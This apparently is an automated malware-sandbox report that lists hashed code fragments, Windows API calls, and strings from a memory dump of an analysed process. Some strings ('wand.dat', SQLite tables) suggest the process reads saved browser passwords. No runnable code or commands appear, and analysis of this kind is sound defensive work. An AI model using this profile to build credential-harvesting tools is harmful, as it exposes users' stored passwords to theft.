                                                                                                                                                                • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                                                                                • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                                                                • memcpy.MSVCRT ref: 0042EC7A
                                                                                                                                                                Strings
                                                                                                                                                                • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                                                                • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                                                                • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                                • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                • API String ID: 1297977491-2063813899
                                                                                                                                                                • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                                                                                • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 0040560C
                                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                                                                                                  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                • String ID: *.*$dat$wand.dat
                                                                                                                                                                • API String ID: 2618321458-1828844352
                                                                                                                                                                • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                                                                                • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                                                • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                                                                                • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                                                                                                • wcslen.MSVCRT ref: 00410C74
                                                                                                                                                                • _wtoi.MSVCRT ref: 00410C80
                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1549203181-0
                                                                                                                                                                • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                                                                                • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                                                                                • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                                                                                • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 00412057
                                                                                                                                                                  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                                                                                                                                                • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                                • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                                • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3550944819-0
                                                                                                                                                                • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                                                                                • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                                • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                                                                                • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                                                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                • memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@$memcpy$mallocwcslen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3023356884-0
                                                                                                                                                                • Opcode ID: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                                                                                                • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                                                                • Opcode Fuzzy Hash: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                                                                                                • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                                                                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                                                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                                                                                                                                • memcpy.MSVCRT ref: 0040B248
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@$memcpy$mallocwcslen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3023356884-0
                                                                                                                                                                • Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                                                                                                • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                                                • Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                                                                                                • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                • String ID: @
                                                                                                                                                                • API String ID: 3510742995-2766056989
                                                                                                                                                                • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                                                                • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1865533344-0
                                                                                                                                                                • Opcode ID: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                                                                                                • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                                                                                • Opcode Fuzzy Hash: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                                                                                                • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                                                                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                                                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                                                                                                                                • memcpy.MSVCRT ref: 0040B159
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@$memcpy$mallocstrlen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1171893557-0
                                                                                                                                                                • Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                                                                                                • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                                                • Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                                                                                                • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 004144E7
                                                                                                                                                                  • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                  • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                                • memset.MSVCRT ref: 0041451A
                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1127616056-0
                                                                                                                                                                • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                                                                                • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                                • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                                                                                • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                • String ID: sqlite_master
                                                                                                                                                                • API String ID: 438689982-3163232059
                                                                                                                                                                • Opcode ID: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                                                                                • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                                                                                • Opcode Fuzzy Hash: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                                                                                • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                                                                • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3917621476-0
                                                                                                                                                                • Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                                                                                • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                                                                                • Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                                                                                • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                                                                • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                                                                • wcscat.MSVCRT ref: 0041101F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 822687973-0
                                                                                                                                                                • Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                                                                                • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                                                                                • Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                                                                                • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,76DBDF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                • malloc.MSVCRT ref: 00417459
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,76DBDF80,?,0041755F,?), ref: 00417478
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteCharMultiWide$??3@malloc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4284152360-0
                                                                                                                                                                • Opcode ID: 11289aaf4270ed2c5fe81a5d6e150162e8e95aba20a128aae83a55a74a659502
                                                                                                                                                                • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                                                • Opcode Fuzzy Hash: 11289aaf4270ed2c5fe81a5d6e150162e8e95aba20a128aae83a55a74a659502
                                                                                                                                                                • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                                                                                                                                                • RegisterClassW.USER32(00000001), ref: 00412428
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                                • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2678498856-0
                                                                                                                                                                • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                                                                                • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                                                • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                                                                                • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                                                                • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                                                                • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                                                                • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$Item
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3888421826-0
                                                                                                                                                                • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                                                                                • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 00417B7B
                                                                                                                                                                • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                                                                • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                                                                • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3727323765-0
                                                                                                                                                                • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                                                                                • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                                                                                • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                                                                                • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
